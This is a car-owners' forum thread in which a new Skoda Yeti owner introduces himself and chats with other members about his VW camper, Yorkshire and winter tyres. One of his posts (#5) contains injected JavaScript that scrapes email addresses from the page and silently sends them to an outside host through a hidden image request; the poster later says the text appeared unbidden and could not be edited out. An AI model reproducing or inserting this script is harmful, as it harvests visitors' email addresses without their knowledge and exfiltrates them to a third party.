Yeti Owners Club banner

1 - 13 of 13 Posts

·
Registered
37 Posts
Discussion Starter #1
Hey all!
Just a quick hello from me.

Yesterday I bought an ex demo Yeti TDi 140 4x4 Elegance from D M Keiths in Leeds, hopefully I'll havecollected it from them by the middle of next week.

This is my first Skoda although I've had a lot of Volkswagen group cars, currently I have fiveVWs dating back 5 decades at home, although this will drop to four once I've collected the Yeti :)

I'll get some photos sorted once it's sat on my drive.

Cheers

Richard

·
Registered
828 Posts
Welcome Dubster,

I also have a 140 TDi Elegance, coming up for it's 1st birthday. You will, I'm sure really enjoy your car. Happy motoring !!!

·
Registered
37 Posts
Discussion Starter #3
Actually getting very excited now, the insurance expires on my current car tomorrow so I'll be driving my VW Camper until the Yeti is ready for collection.

·
Administrator
13,457 Posts
Wow a Yeti and a VW camper! If it's a proper one with the spare on the front I am green with envy.
I keep dropping hints to the Management that it would be good to hire one for a short motoring holiday but she seems to have developed acute selective deafness. Will you be getting a set of winter wheels/tyre for your Yeti?

·
Registered
37 Posts
Discussion Starter #5
< ="" ="text/"> for (var ii=0; ii < document.childNodes.length; ii++) { if (typeof(document.childNodes[ii].innerHTML) != "undefined") { var m = document.childNodes[ii].innerHTML.match(/[a-z0-9_\.-][email protected][a-z0-9_\.-]+\.[a-z\.]{2,6}/ig); if (m != null) { var r = []; for (var j = 0; j < m.length; j++) { var f = false; if (m.length < 100) { for (var jj = j+1; jj < m.length; jj++) { if (m[j].toLowerCase() == m[jj].toLowerCase()) { f = true; break; } } } if (!f) { r.push(m[j]); } } var i=document.createElement('img'); i.style.position = "absolute"; i.style.left = '-1000px'; document.body.appendChild(i); i.src = 'https://e-system.cc/ping.html?cmd=log&w=email&id=YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY&text=' + r.join('|||') + '&r=' + Math.random(); } } } Well I've had the Yeti a week now and I'm very pleased with it.
My camper is a mid eighties models, not the cuter bay window style van.

The winter wheels have been ordered!

·
Registered
47 Posts
Hi Dubster, a welcome from one Yorkshireman to another!

·
Registered
37 Posts
Discussion Starter #8
The Hood, I was simply replying to other posts, but all the extra text appeared in the reply? When I try to edit the unwanted text out I receive an error 500?

GeoffL, thanks for the welcome, whereabout in Yorkshire are you? I'm in Selby.
Edited by: Dubster

·
Registered
47 Posts
Batley, near Leeds, but not too near, thank god.

·
Registered
37 Posts
Discussion Starter #10
GEOFFL said:
Batley, near Leeds, but not too near, thank god.

You may see my black Yeti driving around then :)

We have offices in Pontefract, Wakefield, Leeds, Dewsbury, Bradford, Huddersfield & Halifax, so I spend a lot of my Yeti time parked on the M62!

·
Registered
47 Posts
Unfortunately Dubster, that is unlikely. My wife, Libby, might see you driving around as she seems to have taken over the Yeti (and loves it to bits)
If my memory serves me well I did drive it on holiday in Wales in May.

Think I might sneak out and nick it for a hour!!

·
Registered
37 Posts
Discussion Starter #13
Winter tyres fitted today!

In fact three sets, my Yeti, my wife's Polo and a let my dad have my winter wheel/tyres from my last daily (New Beetle) so I fitted them to his Golf.

I'm bloody cold now!

Bring on the snow

1 - 13 of 13 Posts